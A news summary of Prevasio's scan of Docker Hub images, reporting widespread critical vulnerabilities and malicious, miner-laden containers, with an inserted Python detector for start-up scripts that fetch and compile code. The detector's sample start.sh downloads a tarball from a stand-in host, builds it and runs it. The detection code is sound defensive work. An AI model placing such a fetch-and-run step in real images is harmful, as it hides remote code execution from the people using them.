
51% of 4 million Docker images have critical vulnerabilities

TL;DR

Prevasio, a cybersecurity startup, has announced that it has finished scanning 4 million container images on Docker Hub. Nearly 51% of the images have critical vulnerabilities, and nearly 6,500 of them can be considered malicious.

A dynamic sandbox system was used by Prevasio to download and build images into the Docker containers
Key Facts
  1. According to an analysis by Prevasio, half of all the images available on Docker Hub have critical vulnerabilities due to outdated software. The analysis also revealed that thousands of images are in reality dangerous software, with many of them potentially being attack tools.

  2. As per Prevasio, the malicious containers, representing nearly 0.16% of the total, have been downloaded more than 300 million times. These were classified as malicious due to the presence of malware, hacking tools, cryptocurrency miners, and trojanized applications.

  3. The cybersecurity startup also uncovered images with dynamic payloads. This means that the original image does not look malicious, but it has been scripted to run a miner whose source code is downloaded, compiled, and then executed.

  4. The company used a dynamic sandbox system to download the images and build them into Docker containers. It then ran the containers to detect vulnerabilities and dangerous behavior.
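A static pre-check for the dynamic-payload pattern in Key Fact 3, as an added example that is not from Prevasio or the original article: it flags an image whose start-up path (ENTRYPOINT/CMD and any script it calls) both fetches and builds code. The regexes, function names, and sample Dockerfiles are constructed for illustration, and the check assumes the payload is fetched when the container starts.

```python
import re

# Heuristics (assumptions, not Prevasio's rules): commands that fetch code,
# commands that build it, and the instructions that run at container start.
FETCH = re.compile(r"\b(?:curl|wget|git\s+clone)\b")
BUILD = re.compile(r"\b(?:make|gcc|clang|cmake|go\s+build|cargo\s+build)\b")
START = re.compile(r"^\s*(?:ENTRYPOINT|CMD)\s+(.*)$", re.I)
SCRIPT_REF = re.compile(r"[\w./-]+\.sh\b")

def startup_commands(dockerfile, scripts):
    """Return the text executed at container start: the ENTRYPOINT/CMD
    arguments plus the body of any shell script they reference."""
    parts = []
    for line in dockerfile.splitlines():
        m = START.match(line)
        if not m:
            continue  # RUN/COPY/etc. execute at build time, not at start
        parts.append(m.group(1))
        for ref in SCRIPT_REF.findall(m.group(1)):
            name = ref.rsplit("/", 1)[-1]
            if name in scripts:
                parts.append(scripts[name])
    return "\n".join(parts)

def flags_dynamic_payload(dockerfile, scripts):
    """True when the start-up path both fetches and builds code, so the
    executable that finally runs is absent from the image layers."""
    text = startup_commands(dockerfile, scripts)
    return bool(FETCH.search(text) and BUILD.search(text))

# Constructed sample: toolchain is installed at build time, but the code
# itself is only fetched and compiled when the container starts.
SUSPECT_DOCKERFILE = """\
FROM ubuntu:20.04
RUN apt-get update && apt-get install -y build-essential curl
COPY start.sh /start.sh
ENTRYPOINT ["/bin/sh", "/start.sh"]
"""
SUSPECT_SCRIPTS = {
    "start.sh": "curl -sL https://example.invalid/src.tar.gz | tar xz\n"
                "cd src && make\n./worker\n",
}

# Constructed sample: fetch and build happen in a RUN layer, so the result
# is part of the image and visible to a static scanner.
BENIGN_DOCKERFILE = """\
FROM ubuntu:20.04
RUN curl -sL https://example.invalid/src.tar.gz | tar xz && cd src && make install
CMD ["/usr/local/bin/app"]
"""
```

A hit only marks an image for closer review, and a miss proves nothing: a script can hide its fetch step, which is why the images still have to be run in a sandbox to observe their behavior.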

Details

Prevasio’s report concluded that the Linux OS, and Linux containers in particular, are not immune to security risks. Nearly half of all container images hosted by Docker Hub contained one or more critical vulnerabilities and were potentially exploitable. Only one-fifth of all the images tested by the startup had no disclosed vulnerabilities.

The software supply chain is in greater need of security efforts. More attackers have begun identifying weaknesses and slipping malicious software into employees’ computers, bypassing perimeter security.

Docker adoption has become normal for most enterprise-class complex applications, with several large enterprises implementing Docker containers in some form. With containerization available everywhere, the attack surface has increased exponentially. As such, Prevasio's analysis report should be of great concern to any enterprise customer.

Prevasio warned that if a company’s developer takes a shortcut by fetching a pre-built image instead of building one anew, there is a huge risk that the pre-built image has been trojanized. When such images end up in production, they give attackers easy access to containerized applications via a backdoor.

"Every month there is some bad guy upping their game and utilizing more containers as part of their attack. We expect it to be more prevalent because it is very easy to use a Docker container to trick a target into building the attack tools inside their own network."
Rony Moshkovich, CEO and Co-founder, Prevasio
